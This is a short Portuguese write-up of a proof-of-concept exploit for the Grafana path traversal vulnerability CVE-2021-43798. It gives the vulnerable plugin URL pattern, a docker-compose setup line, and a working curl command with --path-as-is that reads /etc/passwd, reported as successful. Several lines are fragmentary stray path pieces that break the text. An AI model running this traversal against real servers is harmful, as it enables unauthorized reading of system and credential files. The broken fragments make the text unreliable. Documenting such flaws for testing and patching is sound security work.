
Exploit de prova de conceito para a vulnerabilidade de path traversal no Grafana (CVE-2021-43798) que permite leitura não autorizada de arquivos via directory traversal em caminhos de plugins.
../.
<grafana_host_url>/public/plugins/<plugin_id>/, onde <plugin_id> é o ID do plugin instalado. É possível verificar o caminho vulnerável através do material abaixo.
docker-compose up -d
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Foi possível acessar o arquivo /etc/passwd através do comando acima.
../).